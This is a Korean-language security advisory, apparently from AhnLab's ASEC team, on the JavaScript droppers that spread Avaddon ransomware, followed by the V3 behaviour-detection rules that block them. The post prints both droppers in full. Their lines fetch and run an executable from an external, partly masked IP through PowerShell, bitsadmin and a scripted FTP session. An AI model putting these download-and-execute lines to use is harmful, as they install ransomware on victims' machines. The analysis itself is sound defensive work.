Avaddon 랜섬웨어 유포 스크립트 및 V3 행위탐지

지난 6월 26일 “RigEK 이용한 Avaddon 랜섬웨어 국내 유포 중(*.avdn 확장자)“라는 제목으로 블로그를 통해 분석 정보를 공유하였다. ASEC 분석팀은 금일 이 Avaddon 랜섬웨어 유포에 사용된 자바 스크립트 파일을 확인하여 이에 대한 내용과 해당 유포에 사용된 방법이 V3 행위탐지에 의해 사전 차단되는 내용을 소개하고자 한다.

https://asec.ahnlab.com/1338

아래의 코드가 실제 해당 랜섬웨어 유포에 사용된 코드이다. Powershell, bitsadmin 및 FTP를 이용한 외부파일 다운로드 기능을 사용하였다. 

var zifidz = 99575;
var igigh = 293994;
var goaehg = 203004;
var ieahgheai = 29499;
var jsRun=new ActiveXObject('WSCRIPT.Shell');
var daogdeg = 200054;
var shougeahf = 40050;
jsRun.Run("cmd.exe cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://xxx.8.117.xx/wtava.exe','%temp%\\7865336.exe');Start-Process '%temp%\\7865336.exe'",false);
var oehgrhg = 394995;
var gouheaugh = 3949050;
var rohgrhg = 359395;
var sgirgh = 495032;
jsRun.Run("cmd.exe /c bitsadmin /transfer twetaeihwuwe /download /priority high http://xxx.8.117.xx/wtava.exe %temp%\\75365357.exe&start %temp%\\75365357.exe", false);
var gaheiifaeh = 200305;
var osrghuorshg = 294995;
var ouaeguo = 3294950;

[유포 자바스트립트 파일1]

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://xxx.8.117.xx/jpr.exe','%temp%\26474224.exe');Start-Process '%temp%\26474224.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer downit /download /priority high http://xxx.8.117.xx/jpr.exe %temp%\46247242.exe&start %temp%\46247242.exe", false);
jsRun.Run("cmd.exe /c echo open xxx.8.117.xx >> ftp &echo user srijan passpass >> ftp &echo binary >> ftp &echo get jpr.exe >> ftp &echo bye >> ftp &ftp -n -v -s:ftp &del ftp&start jpr.exe", false);

[유포 자바스크립트 파일2]

각각의 유포 스크립트에서 파일 다운로드 시, 파일마다 같은 다운로드 주소를 사용하지만 다운로드 된 파일을 저장할 때에는 각각 다른 이름으로 저장된다. Powershell과 Bitsadmin를 통해 다운로드 된 파일은 7, 8자리의 숫자로 구성된 파일명으로 %temp%경로에 저장되며, FTP를 이용한 경우에는 다운로드 시 사용된 명과 같은 이름으로 저장된다.

V3 제품에서는 이러한 유포 방식에 대해 다운로드 및 자동실행 등록 시점에 행위탐지 기능으로 사전차단을 수행하고 있으며 각각의 차단 룰의 정보는 아래와 같다.

[1] Powershell.exe 이용한 파일 다운로드

  • Malware/MDP.Behavior.M2514 진단명으로 행위탐지

[2] Bitsadmin.exe 이용한 파일 다운로드

  • Malware/MDP.Download.M3120 진단명으로 행위탐지

[3] 다운로드 후, 자동실행 등록행위

  • Malware/MDP.AutoRun.M224 진단명으로 행위탐지
0 0 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments